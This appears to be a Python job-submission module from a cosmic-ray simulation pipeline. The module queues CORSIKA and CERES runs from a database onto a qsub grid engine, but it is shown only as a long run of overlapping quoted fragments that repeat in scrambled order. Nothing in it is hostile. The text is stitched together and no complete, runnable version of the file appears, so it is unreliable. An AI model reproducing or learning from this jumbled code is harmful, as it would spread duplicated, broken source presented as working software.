"get_pending_jobs(max_jobs=new_jobs, location=self.location) for job in pending_jobs: if self.event.is_set(): break kwargs = { 'mopro_directory':",
"if isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory ) log.info(f'Submitted new CORSIKA job with",
"from ..queries import get_pending_jobs, count_jobs, update_job_status from .corsika import prepare_corsika_job from .ceres import",
"for the zmq communication ''' super().__init__() self.event = Event() self.interval = interval self.max_queued_jobs",
"= count_jobs(CeresRun, status='created') n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika}",
"No new jobs are submitted if the number of jobs in the queue",
"self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory ) log.info(f'Submitted new CORSIKA job with id {job.id}') elif",
"self.interval = interval self.max_queued_jobs = max_queued_jobs self.mopro_directory = mopro_directory self.host = host self.port",
"if not to many jobs are running already. ''' pending_corsika = count_jobs(CorsikaRun, status='created')",
"self, interval, max_queued_jobs, mopro_directory, host, port, cluster, location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ): '''",
"self.location = location or hostname self.ceres_memory = ceres_memory self.corsika_memory = corsika_memory self.tmp_dir =",
"log.debug(f'{pending_ceres} pending CERES jobs in database') new_jobs = self.max_queued_jobs - n_queued if new_jobs",
"jobs are running already. ''' pending_corsika = count_jobs(CorsikaRun, status='created') pending_ceres = count_jobs(CeresRun, status='created')",
"count_jobs, update_job_status from .corsika import prepare_corsika_job from .ceres import prepare_ceres_job log = logging.getLogger(__name__)",
"directory. host: str hostname of the submitter node port: int port for the",
"to this directory. host: str hostname of the submitter node port: int port",
"in database') new_jobs = self.max_queued_jobs - n_queued if new_jobs > 0: pending_jobs =",
"from the processing database and submits them using qsub if not to many",
"from .ceres import prepare_ceres_job log = logging.getLogger(__name__) hostname = socket.getfqdn() class JobSubmitter(Thread): def",
"new jobs are submitted if the number of jobs in the queue is",
"ceres_memory='12G', tmp_dir=None, ): ''' Parametrs ---------- interval: int number of seconds to wait",
"= get_pending_jobs(max_jobs=new_jobs, location=self.location) for job in pending_jobs: if self.event.is_set(): break kwargs = {",
"..database import CorsikaRun, CeresRun from ..queries import get_pending_jobs, count_jobs, update_job_status from .corsika import",
"host self.port = port self.cluster = cluster self.location = location or hostname self.ceres_memory",
"): ''' Parametrs ---------- interval: int number of seconds to wait between submissions",
"except Exception as e: log.exception('Error during submission: {}'.format(e)) self.event.wait(self.interval) def terminate(self): self.event.set() def",
"self.host = host self.port = port self.cluster = cluster self.location = location or",
"of jobs in the queue is higher than this value mopro_directory: str patch",
"'mopro_directory': self.mopro_directory, 'submitter_host': self.host, 'submitter_port': self.port, 'tmp_dir': self.tmp_dir } try: if isinstance(job, CorsikaRun):",
"= socket.getfqdn() class JobSubmitter(Thread): def __init__( self, interval, max_queued_jobs, mopro_directory, host, port, cluster,",
"= mopro_directory self.host = host self.port = port self.cluster = cluster self.location =",
"hostname of the submitter node port: int port for the zmq communication '''",
".corsika import prepare_corsika_job from .ceres import prepare_ceres_job log = logging.getLogger(__name__) hostname = socket.getfqdn()",
"self.event.is_set(): try: self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost database connection') except Exception as e: log.exception('Error",
"connection') except Exception as e: log.exception('Error during submission: {}'.format(e)) self.event.wait(self.interval) def terminate(self): self.event.set()",
"for erna. Logfiles, jars, xmls and analysis output are stored in subdirectories to",
"database connection') except Exception as e: log.exception('Error during submission: {}'.format(e)) self.event.wait(self.interval) def terminate(self):",
"self.event.set() def process_pending_jobs(self): ''' Fetches pending runs from the processing database and submits",
"= corsika_memory self.tmp_dir = tmp_dir def run(self): while not self.event.is_set(): try: self.process_pending_jobs() except",
"self.event = Event() self.interval = interval self.max_queued_jobs = max_queued_jobs self.mopro_directory = mopro_directory self.host",
"stored in subdirectories to this directory. host: str hostname of the submitter node",
"output are stored in subdirectories to this directory. host: str hostname of the",
"submission: {}'.format(e)) self.event.wait(self.interval) def terminate(self): self.event.set() def process_pending_jobs(self): ''' Fetches pending runs from",
"socket.getfqdn() class JobSubmitter(Thread): def __init__( self, interval, max_queued_jobs, mopro_directory, host, port, cluster, location=None,",
"log.info(f'Submitted new CORSIKA job with id {job.id}') elif isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs),",
"= port self.cluster = cluster self.location = location or hostname self.ceres_memory = ceres_memory",
"---------- interval: int number of seconds to wait between submissions max_queued_jobs: int Maximum",
"host: str hostname of the submitter node port: int port for the zmq",
"logging import peewee import socket from ..database import CorsikaRun, CeresRun from ..queries import",
"jobs in the queue of the grid engine No new jobs are submitted",
"node port: int port for the zmq communication ''' super().__init__() self.event = Event()",
"> 0: pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location) for job in pending_jobs: if self.event.is_set(): break",
"try: if isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory ) log.info(f'Submitted new CORSIKA job",
"log.debug(f'{pending_corsika} pending CORSIKA jobs in database') log.debug(f'{pending_ceres} pending CERES jobs in database') new_jobs",
"self.tmp_dir = tmp_dir def run(self): while not self.event.is_set(): try: self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost",
"self.ceres_memory = ceres_memory self.corsika_memory = corsika_memory self.tmp_dir = tmp_dir def run(self): while not",
"} try: if isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory ) log.info(f'Submitted new CORSIKA",
"many jobs are running already. ''' pending_corsika = count_jobs(CorsikaRun, status='created') pending_ceres = count_jobs(CeresRun,",
"= cluster self.location = location or hostname self.ceres_memory = ceres_memory self.corsika_memory = corsika_memory",
"CORSIKA jobs in database') log.debug(f'{pending_ceres} pending CERES jobs in database') new_jobs = self.max_queued_jobs",
"Event import logging import peewee import socket from ..database import CorsikaRun, CeresRun from",
"self.event.is_set(): break kwargs = { 'mopro_directory': self.mopro_directory, 'submitter_host': self.host, 'submitter_port': self.port, 'tmp_dir': self.tmp_dir",
"max_queued_jobs: int Maximum number of jobs in the queue of the grid engine",
"jobs in the queue is higher than this value mopro_directory: str patch to",
"pending CORSIKA jobs in database') log.debug(f'{pending_ceres} pending CERES jobs in database') new_jobs =",
"type: {job}') update_job_status(type(job), job.id, 'queued', location=self.location) except: log.exception('Could not submit job') update_job_status(type(job), job.id,",
"corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ): ''' Parametrs ---------- interval: int number of seconds to",
"the processing database and submits them using qsub if not to many jobs",
"__init__( self, interval, max_queued_jobs, mopro_directory, host, port, cluster, location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ):",
"''' Fetches pending runs from the processing database and submits them using qsub",
"isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory ) log.info(f'Submitted new CERES job with id",
"or hostname self.ceres_memory = ceres_memory self.corsika_memory = corsika_memory self.tmp_dir = tmp_dir def run(self):",
"location or hostname self.ceres_memory = ceres_memory self.corsika_memory = corsika_memory self.tmp_dir = tmp_dir def",
"try: self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost database connection') except Exception as e: log.exception('Error during",
"of seconds to wait between submissions max_queued_jobs: int Maximum number of jobs in",
"= interval self.max_queued_jobs = max_queued_jobs self.mopro_directory = mopro_directory self.host = host self.port =",
"hostname self.ceres_memory = ceres_memory self.corsika_memory = corsika_memory self.tmp_dir = tmp_dir def run(self): while",
"count_jobs(CeresRun, status='created') n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika} pending",
".ceres import prepare_ceres_job log = logging.getLogger(__name__) hostname = socket.getfqdn() class JobSubmitter(Thread): def __init__(",
"CERES job with id {job.id}') else: raise ValueError(f'Unknown job type: {job}') update_job_status(type(job), job.id,",
"than this value mopro_directory: str patch to the basic structure for erna. Logfiles,",
"this value mopro_directory: str patch to the basic structure for erna. Logfiles, jars,",
"port, cluster, location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ): ''' Parametrs ---------- interval: int number",
"jobs in database') log.debug(f'{pending_ceres} pending CERES jobs in database') new_jobs = self.max_queued_jobs -",
"jars, xmls and analysis output are stored in subdirectories to this directory. host:",
"import peewee import socket from ..database import CorsikaRun, CeresRun from ..queries import get_pending_jobs,",
"= max_queued_jobs self.mopro_directory = mopro_directory self.host = host self.port = port self.cluster =",
"the queue is higher than this value mopro_directory: str patch to the basic",
"import logging import peewee import socket from ..database import CorsikaRun, CeresRun from ..queries",
"pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location) for job in pending_jobs: if self.event.is_set(): break kwargs =",
"tmp_dir=None, ): ''' Parametrs ---------- interval: int number of seconds to wait between",
"import prepare_ceres_job log = logging.getLogger(__name__) hostname = socket.getfqdn() class JobSubmitter(Thread): def __init__( self,",
"in the queue is higher than this value mopro_directory: str patch to the",
"self.corsika_memory = corsika_memory self.tmp_dir = tmp_dir def run(self): while not self.event.is_set(): try: self.process_pending_jobs()",
"jobs running') log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika} pending CORSIKA jobs in database') log.debug(f'{pending_ceres} pending",
"is higher than this value mopro_directory: str patch to the basic structure for",
"if new_jobs > 0: pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location) for job in pending_jobs: if",
"import socket from ..database import CorsikaRun, CeresRun from ..queries import get_pending_jobs, count_jobs, update_job_status",
"if the number of jobs in the queue is higher than this value",
"'submitter_host': self.host, 'submitter_port': self.port, 'tmp_dir': self.tmp_dir } try: if isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job,",
"- n_queued if new_jobs > 0: pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location) for job in",
"host, port, cluster, location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ): ''' Parametrs ---------- interval: int",
"interval, max_queued_jobs, mopro_directory, host, port, cluster, location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ): ''' Parametrs",
"structure for erna. Logfiles, jars, xmls and analysis output are stored in subdirectories",
"memory=self.ceres_memory ) log.info(f'Submitted new CERES job with id {job.id}') else: raise ValueError(f'Unknown job",
"not self.event.is_set(): try: self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost database connection') except Exception as e:",
"max_queued_jobs self.mopro_directory = mopro_directory self.host = host self.port = port self.cluster = cluster",
"= self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika} pending CORSIKA jobs in",
"except peewee.OperationalError: log.exception('Lost database connection') except Exception as e: log.exception('Error during submission: {}'.format(e))",
"while not self.event.is_set(): try: self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost database connection') except Exception as",
"for job in pending_jobs: if self.event.is_set(): break kwargs = { 'mopro_directory': self.mopro_directory, 'submitter_host':",
"queued') log.debug(f'{pending_corsika} pending CORSIKA jobs in database') log.debug(f'{pending_ceres} pending CERES jobs in database')",
"= host self.port = port self.cluster = cluster self.location = location or hostname",
"log.exception('Lost database connection') except Exception as e: log.exception('Error during submission: {}'.format(e)) self.event.wait(self.interval) def",
"import Thread, Event import logging import peewee import socket from ..database import CorsikaRun,",
"elif isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory ) log.info(f'Submitted new CERES job with",
"number of jobs in the queue is higher than this value mopro_directory: str",
"= location or hostname self.ceres_memory = ceres_memory self.corsika_memory = corsika_memory self.tmp_dir = tmp_dir",
"def run(self): while not self.event.is_set(): try: self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost database connection') except",
"prepare_ceres_job log = logging.getLogger(__name__) hostname = socket.getfqdn() class JobSubmitter(Thread): def __init__( self, interval,",
"of the submitter node port: int port for the zmq communication ''' super().__init__()",
"else: raise ValueError(f'Unknown job type: {job}') update_job_status(type(job), job.id, 'queued', location=self.location) except: log.exception('Could not",
"the basic structure for erna. Logfiles, jars, xmls and analysis output are stored",
"{job}') update_job_status(type(job), job.id, 'queued', location=self.location) except: log.exception('Could not submit job') update_job_status(type(job), job.id, 'failed')",
"update_job_status from .corsika import prepare_corsika_job from .ceres import prepare_ceres_job log = logging.getLogger(__name__) hostname",
"as e: log.exception('Error during submission: {}'.format(e)) self.event.wait(self.interval) def terminate(self): self.event.set() def process_pending_jobs(self): '''",
"Logfiles, jars, xmls and analysis output are stored in subdirectories to this directory.",
"self.max_queued_jobs - n_queued if new_jobs > 0: pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location) for job",
"'submitter_port': self.port, 'tmp_dir': self.tmp_dir } try: if isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory",
"Event() self.interval = interval self.max_queued_jobs = max_queued_jobs self.mopro_directory = mopro_directory self.host = host",
"location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ): ''' Parametrs ---------- interval: int number of seconds",
") log.info(f'Submitted new CERES job with id {job.id}') else: raise ValueError(f'Unknown job type:",
"= tmp_dir def run(self): while not self.event.is_set(): try: self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost database",
"communication ''' super().__init__() self.event = Event() self.interval = interval self.max_queued_jobs = max_queued_jobs self.mopro_directory",
"them using qsub if not to many jobs are running already. ''' pending_corsika",
"interval: int number of seconds to wait between submissions max_queued_jobs: int Maximum number",
"erna. Logfiles, jars, xmls and analysis output are stored in subdirectories to this",
"pending_ceres = count_jobs(CeresRun, status='created') n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued} jobs queued')",
"tmp_dir def run(self): while not self.event.is_set(): try: self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost database connection')",
"run(self): while not self.event.is_set(): try: self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost database connection') except Exception",
"between submissions max_queued_jobs: int Maximum number of jobs in the queue of the",
"log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika} pending CORSIKA jobs in database') log.debug(f'{pending_ceres} pending CERES jobs",
"break kwargs = { 'mopro_directory': self.mopro_directory, 'submitter_host': self.host, 'submitter_port': self.port, 'tmp_dir': self.tmp_dir }",
"pending_jobs: if self.event.is_set(): break kwargs = { 'mopro_directory': self.mopro_directory, 'submitter_host': self.host, 'submitter_port': self.port,",
"xmls and analysis output are stored in subdirectories to this directory. host: str",
"new_jobs > 0: pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location) for job in pending_jobs: if self.event.is_set():",
"e: log.exception('Error during submission: {}'.format(e)) self.event.wait(self.interval) def terminate(self): self.event.set() def process_pending_jobs(self): ''' Fetches",
"mopro_directory: str patch to the basic structure for erna. Logfiles, jars, xmls and",
"max_queued_jobs, mopro_directory, host, port, cluster, location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ): ''' Parametrs ----------",
"are running already. ''' pending_corsika = count_jobs(CorsikaRun, status='created') pending_ceres = count_jobs(CeresRun, status='created') n_queued",
"of jobs in the queue of the grid engine No new jobs are",
"cluster self.location = location or hostname self.ceres_memory = ceres_memory self.corsika_memory = corsika_memory self.tmp_dir",
"ceres_memory self.corsika_memory = corsika_memory self.tmp_dir = tmp_dir def run(self): while not self.event.is_set(): try:",
"running already. ''' pending_corsika = count_jobs(CorsikaRun, status='created') pending_ceres = count_jobs(CeresRun, status='created') n_queued =",
"queue is higher than this value mopro_directory: str patch to the basic structure",
") log.info(f'Submitted new CORSIKA job with id {job.id}') elif isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job,",
"import get_pending_jobs, count_jobs, update_job_status from .corsika import prepare_corsika_job from .ceres import prepare_ceres_job log",
"port for the zmq communication ''' super().__init__() self.event = Event() self.interval = interval",
"grid engine No new jobs are submitted if the number of jobs in",
"self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika} pending CORSIKA jobs in database')",
"job with id {job.id}') elif isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory ) log.info(f'Submitted",
"Thread, Event import logging import peewee import socket from ..database import CorsikaRun, CeresRun",
"seconds to wait between submissions max_queued_jobs: int Maximum number of jobs in the",
"pending CERES jobs in database') new_jobs = self.max_queued_jobs - n_queued if new_jobs >",
"memory=self.corsika_memory ) log.info(f'Submitted new CORSIKA job with id {job.id}') elif isinstance(job, CeresRun): self.cluster.submit_job(",
"get_pending_jobs, count_jobs, update_job_status from .corsika import prepare_corsika_job from .ceres import prepare_ceres_job log =",
"running') log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika} pending CORSIKA jobs in database') log.debug(f'{pending_ceres} pending CERES",
"of the grid engine No new jobs are submitted if the number of",
"logging.getLogger(__name__) hostname = socket.getfqdn() class JobSubmitter(Thread): def __init__( self, interval, max_queued_jobs, mopro_directory, host,",
"self.port = port self.cluster = cluster self.location = location or hostname self.ceres_memory =",
"def __init__( self, interval, max_queued_jobs, mopro_directory, host, port, cluster, location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None,",
"to wait between submissions max_queued_jobs: int Maximum number of jobs in the queue",
"peewee.OperationalError: log.exception('Lost database connection') except Exception as e: log.exception('Error during submission: {}'.format(e)) self.event.wait(self.interval)",
"''' super().__init__() self.event = Event() self.interval = interval self.max_queued_jobs = max_queued_jobs self.mopro_directory =",
"''' pending_corsika = count_jobs(CorsikaRun, status='created') pending_ceres = count_jobs(CeresRun, status='created') n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running}",
"n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika} pending CORSIKA jobs",
"the number of jobs in the queue is higher than this value mopro_directory:",
"self.process_pending_jobs() except peewee.OperationalError: log.exception('Lost database connection') except Exception as e: log.exception('Error during submission:",
"'tmp_dir': self.tmp_dir } try: if isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory ) log.info(f'Submitted",
"the zmq communication ''' super().__init__() self.event = Event() self.interval = interval self.max_queued_jobs =",
"mopro_directory, host, port, cluster, location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ): ''' Parametrs ---------- interval:",
"jobs in database') new_jobs = self.max_queued_jobs - n_queued if new_jobs > 0: pending_jobs",
"**prepare_corsika_job(job, **kwargs), memory=self.corsika_memory ) log.info(f'Submitted new CORSIKA job with id {job.id}') elif isinstance(job,",
"wait between submissions max_queued_jobs: int Maximum number of jobs in the queue of",
"mopro_directory self.host = host self.port = port self.cluster = cluster self.location = location",
"pending_corsika = count_jobs(CorsikaRun, status='created') pending_ceres = count_jobs(CeresRun, status='created') n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs",
"terminate(self): self.event.set() def process_pending_jobs(self): ''' Fetches pending runs from the processing database and",
"id {job.id}') else: raise ValueError(f'Unknown job type: {job}') update_job_status(type(job), job.id, 'queued', location=self.location) except:",
"def terminate(self): self.event.set() def process_pending_jobs(self): ''' Fetches pending runs from the processing database",
"= self.max_queued_jobs - n_queued if new_jobs > 0: pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location) for",
"self.tmp_dir } try: if isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory ) log.info(f'Submitted new",
"{}'.format(e)) self.event.wait(self.interval) def terminate(self): self.event.set() def process_pending_jobs(self): ''' Fetches pending runs from the",
"{job.id}') elif isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory ) log.info(f'Submitted new CERES job",
"using qsub if not to many jobs are running already. ''' pending_corsika =",
"hostname = socket.getfqdn() class JobSubmitter(Thread): def __init__( self, interval, max_queued_jobs, mopro_directory, host, port,",
"submitter node port: int port for the zmq communication ''' super().__init__() self.event =",
"self.port, 'tmp_dir': self.tmp_dir } try: if isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory )",
"log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika} pending CORSIKA jobs in database') log.debug(f'{pending_ceres}",
"int Maximum number of jobs in the queue of the grid engine No",
"with id {job.id}') else: raise ValueError(f'Unknown job type: {job}') update_job_status(type(job), job.id, 'queued', location=self.location)",
"engine No new jobs are submitted if the number of jobs in the",
"to many jobs are running already. ''' pending_corsika = count_jobs(CorsikaRun, status='created') pending_ceres =",
"submitted if the number of jobs in the queue is higher than this",
"subdirectories to this directory. host: str hostname of the submitter node port: int",
"patch to the basic structure for erna. Logfiles, jars, xmls and analysis output",
"during submission: {}'.format(e)) self.event.wait(self.interval) def terminate(self): self.event.set() def process_pending_jobs(self): ''' Fetches pending runs",
"job type: {job}') update_job_status(type(job), job.id, 'queued', location=self.location) except: log.exception('Could not submit job') update_job_status(type(job),",
"the queue of the grid engine No new jobs are submitted if the",
"zmq communication ''' super().__init__() self.event = Event() self.interval = interval self.max_queued_jobs = max_queued_jobs",
"self.mopro_directory, 'submitter_host': self.host, 'submitter_port': self.port, 'tmp_dir': self.tmp_dir } try: if isinstance(job, CorsikaRun): self.cluster.submit_job(",
"= Event() self.interval = interval self.max_queued_jobs = max_queued_jobs self.mopro_directory = mopro_directory self.host =",
"str hostname of the submitter node port: int port for the zmq communication",
"kwargs = { 'mopro_directory': self.mopro_directory, 'submitter_host': self.host, 'submitter_port': self.port, 'tmp_dir': self.tmp_dir } try:",
"from threading import Thread, Event import logging import peewee import socket from ..database",
"status='created') n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued} jobs queued') log.debug(f'{pending_corsika} pending CORSIKA",
"int number of seconds to wait between submissions max_queued_jobs: int Maximum number of",
"cluster, location=None, corsika_memory='4G', ceres_memory='12G', tmp_dir=None, ): ''' Parametrs ---------- interval: int number of",
"new CERES job with id {job.id}') else: raise ValueError(f'Unknown job type: {job}') update_job_status(type(job),",
"location=self.location) for job in pending_jobs: if self.event.is_set(): break kwargs = { 'mopro_directory': self.mopro_directory,",
"in the queue of the grid engine No new jobs are submitted if",
"new CORSIKA job with id {job.id}') elif isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory",
"if self.event.is_set(): break kwargs = { 'mopro_directory': self.mopro_directory, 'submitter_host': self.host, 'submitter_port': self.port, 'tmp_dir':",
"new_jobs = self.max_queued_jobs - n_queued if new_jobs > 0: pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location)",
"0: pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location) for job in pending_jobs: if self.event.is_set(): break kwargs",
"higher than this value mopro_directory: str patch to the basic structure for erna.",
"port: int port for the zmq communication ''' super().__init__() self.event = Event() self.interval",
"in database') log.debug(f'{pending_ceres} pending CERES jobs in database') new_jobs = self.max_queued_jobs - n_queued",
"runs from the processing database and submits them using qsub if not to",
"in subdirectories to this directory. host: str hostname of the submitter node port:",
"''' Parametrs ---------- interval: int number of seconds to wait between submissions max_queued_jobs:",
"**prepare_ceres_job(job, **kwargs), memory=self.ceres_memory ) log.info(f'Submitted new CERES job with id {job.id}') else: raise",
"CorsikaRun, CeresRun from ..queries import get_pending_jobs, count_jobs, update_job_status from .corsika import prepare_corsika_job from",
"jobs queued') log.debug(f'{pending_corsika} pending CORSIKA jobs in database') log.debug(f'{pending_ceres} pending CERES jobs in",
"ValueError(f'Unknown job type: {job}') update_job_status(type(job), job.id, 'queued', location=self.location) except: log.exception('Could not submit job')",
"self.max_queued_jobs = max_queued_jobs self.mopro_directory = mopro_directory self.host = host self.port = port self.cluster",
"are stored in subdirectories to this directory. host: str hostname of the submitter",
"class JobSubmitter(Thread): def __init__( self, interval, max_queued_jobs, mopro_directory, host, port, cluster, location=None, corsika_memory='4G',",
"value mopro_directory: str patch to the basic structure for erna. Logfiles, jars, xmls",
"are submitted if the number of jobs in the queue is higher than",
"from .corsika import prepare_corsika_job from .ceres import prepare_ceres_job log = logging.getLogger(__name__) hostname =",
"submits them using qsub if not to many jobs are running already. '''",
"str patch to the basic structure for erna. Logfiles, jars, xmls and analysis",
"with id {job.id}') elif isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory ) log.info(f'Submitted new",
"CORSIKA job with id {job.id}') elif isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory )",
"analysis output are stored in subdirectories to this directory. host: str hostname of",
"Exception as e: log.exception('Error during submission: {}'.format(e)) self.event.wait(self.interval) def terminate(self): self.event.set() def process_pending_jobs(self):",
"peewee import socket from ..database import CorsikaRun, CeresRun from ..queries import get_pending_jobs, count_jobs,",
"submissions max_queued_jobs: int Maximum number of jobs in the queue of the grid",
"isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory ) log.info(f'Submitted new CORSIKA job with id",
"int port for the zmq communication ''' super().__init__() self.event = Event() self.interval =",
"count_jobs(CorsikaRun, status='created') pending_ceres = count_jobs(CeresRun, status='created') n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued}",
"database and submits them using qsub if not to many jobs are running",
"job in pending_jobs: if self.event.is_set(): break kwargs = { 'mopro_directory': self.mopro_directory, 'submitter_host': self.host,",
"JobSubmitter(Thread): def __init__( self, interval, max_queued_jobs, mopro_directory, host, port, cluster, location=None, corsika_memory='4G', ceres_memory='12G',",
"and submits them using qsub if not to many jobs are running already.",
"already. ''' pending_corsika = count_jobs(CorsikaRun, status='created') pending_ceres = count_jobs(CeresRun, status='created') n_queued = self.cluster.n_queued",
"socket from ..database import CorsikaRun, CeresRun from ..queries import get_pending_jobs, count_jobs, update_job_status from",
"super().__init__() self.event = Event() self.interval = interval self.max_queued_jobs = max_queued_jobs self.mopro_directory = mopro_directory",
"threading import Thread, Event import logging import peewee import socket from ..database import",
"corsika_memory self.tmp_dir = tmp_dir def run(self): while not self.event.is_set(): try: self.process_pending_jobs() except peewee.OperationalError:",
"Maximum number of jobs in the queue of the grid engine No new",
"number of seconds to wait between submissions max_queued_jobs: int Maximum number of jobs",
"CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs), memory=self.corsika_memory ) log.info(f'Submitted new CORSIKA job with id {job.id}')",
"**kwargs), memory=self.corsika_memory ) log.info(f'Submitted new CORSIKA job with id {job.id}') elif isinstance(job, CeresRun):",
"processing database and submits them using qsub if not to many jobs are",
"database') log.debug(f'{pending_ceres} pending CERES jobs in database') new_jobs = self.max_queued_jobs - n_queued if",
"number of jobs in the queue of the grid engine No new jobs",
"self.cluster = cluster self.location = location or hostname self.ceres_memory = ceres_memory self.corsika_memory =",
"self.host, 'submitter_port': self.port, 'tmp_dir': self.tmp_dir } try: if isinstance(job, CorsikaRun): self.cluster.submit_job( **prepare_corsika_job(job, **kwargs),",
"process_pending_jobs(self): ''' Fetches pending runs from the processing database and submits them using",
"and analysis output are stored in subdirectories to this directory. host: str hostname",
"the grid engine No new jobs are submitted if the number of jobs",
"CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory ) log.info(f'Submitted new CERES job with id {job.id}')",
"..queries import get_pending_jobs, count_jobs, update_job_status from .corsika import prepare_corsika_job from .ceres import prepare_ceres_job",
"self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory ) log.info(f'Submitted new CERES job with id {job.id}') else:",
"{job.id}') else: raise ValueError(f'Unknown job type: {job}') update_job_status(type(job), job.id, 'queued', location=self.location) except: log.exception('Could",
"= count_jobs(CorsikaRun, status='created') pending_ceres = count_jobs(CeresRun, status='created') n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running')",
"not to many jobs are running already. ''' pending_corsika = count_jobs(CorsikaRun, status='created') pending_ceres",
"def process_pending_jobs(self): ''' Fetches pending runs from the processing database and submits them",
"= { 'mopro_directory': self.mopro_directory, 'submitter_host': self.host, 'submitter_port': self.port, 'tmp_dir': self.tmp_dir } try: if",
"CERES jobs in database') new_jobs = self.max_queued_jobs - n_queued if new_jobs > 0:",
"to the basic structure for erna. Logfiles, jars, xmls and analysis output are",
"this directory. host: str hostname of the submitter node port: int port for",
"prepare_corsika_job from .ceres import prepare_ceres_job log = logging.getLogger(__name__) hostname = socket.getfqdn() class JobSubmitter(Thread):",
"log.exception('Error during submission: {}'.format(e)) self.event.wait(self.interval) def terminate(self): self.event.set() def process_pending_jobs(self): ''' Fetches pending",
"n_queued if new_jobs > 0: pending_jobs = get_pending_jobs(max_jobs=new_jobs, location=self.location) for job in pending_jobs:",
"self.mopro_directory = mopro_directory self.host = host self.port = port self.cluster = cluster self.location",
"id {job.id}') elif isinstance(job, CeresRun): self.cluster.submit_job( **prepare_ceres_job(job, **kwargs), memory=self.ceres_memory ) log.info(f'Submitted new CERES",
"Fetches pending runs from the processing database and submits them using qsub if",
"from ..database import CorsikaRun, CeresRun from ..queries import get_pending_jobs, count_jobs, update_job_status from .corsika",
"database') new_jobs = self.max_queued_jobs - n_queued if new_jobs > 0: pending_jobs = get_pending_jobs(max_jobs=new_jobs,",
"= logging.getLogger(__name__) hostname = socket.getfqdn() class JobSubmitter(Thread): def __init__( self, interval, max_queued_jobs, mopro_directory,",
